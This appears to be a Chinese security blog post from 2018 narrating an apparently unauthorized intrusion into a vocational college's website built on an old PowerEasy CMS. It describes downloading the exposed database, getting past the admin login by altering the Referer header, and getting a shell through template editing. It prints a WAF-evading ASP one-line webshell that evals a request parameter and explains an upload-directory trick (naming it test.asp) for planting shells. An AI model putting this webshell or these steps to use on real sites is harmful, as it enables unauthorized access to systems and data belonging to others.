记录一下对于一个职业学院的渗透测试过程。
团队的力量很强大,安全无小事!
0x01 偶遇&吐槽:
在机缘巧合下,遇见了这个网站,发现有一个旧版网站,还是动易的CMS
,指纹查看一下:
网站中还存在这些有趣的东西:
然后使用御剑扫了一下,发现可以下载数据库,然后我就把这个洞,提交给了360的补天平台
,好歹算个学校吧,一共提交了两次,第一次说漏洞不够详细。。。(一个数据库下载漏洞,能有多详细,难道还能把数据下载了发你不成)。
第二次我修改了提交,审核说,漏洞存在,但是不构成威胁…(这审核是实习生吧?)
真的是无语的审核了,本来有接近一年没去补天,就是因为审核的原因,本以为一年后会好一些,没想到。。。虽然平台不怎么样,但是补天的线下沙龙还是做的很不错的。
因此下面在各位团队成员的深挖下,验证了此网站并不是固若金汤!
0x02 深入测试:
在数据库中找到了一个user表
,在网站的新闻中心有一个登陆表单,登录后,进入用户管理后台:
其实这个算不上后台,有上传点,但是没法儿利用,看到url中的user就知道是用户中心而非管理后台了,动易的管理后台登录地址为:/Admin/Admin_login.asp
在数据库中找到admin
账户,登陆发现:
问了一下X1r0z这个女装大佬[滑稽],需要修改Referer
中的参数,去掉81port
,分析认为:这是一个旧版网站,原本是80端口的,管理员为了保留就转移到了81端口
,但是动易的程序在后台并没有修改判断条件,就导致了怎么登陆也进入不了后台的情况
现在成功登录后台,登录的时候需要设置referer
,其他的不需要
0x03 获取Shell:
X1r0z提供的方法是在系统管理的下载中心中倒腾,我就直接修改模版了,因为兼容性的问题,按钮没反应,所以就使用IE6一点点弄的,真的很麻烦…
一个过狗的ASP小马:
<% dim x1,x2 x1 = request("x") x2 = x1 eval x2 %>
最后连接得到:
0x04 总结:
当然已经做好了善后的工作,已经清除了小马,帮管理员填上了洞,数据库确实没办法了。推荐大家提交CNVD或者漏洞盒子,漏洞银行或者对应的SRC厂商!
最后再强调一下,团队的力量是强大的,安全无小事!!!
0x05 补充:
以下内容来自 X1r0z
小裙子 (<_<)
系统设置
- 网站频道管理
- 下载中心
- 频道类型
将 上传文件的保存目录 改成 test.asp
最后左栏找到对应的频道直接上传, 抓包的路径不全, 还需要手动拼接下.
下载中心的目录为 /Soft/
其它频道的目录在 频道类型 - 频道目录
里.
版权声明:《 [渗透实战]记录某职业中学测试 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-7-13 09:07:23
2018-07-14 15:44
2018-07-14 09:47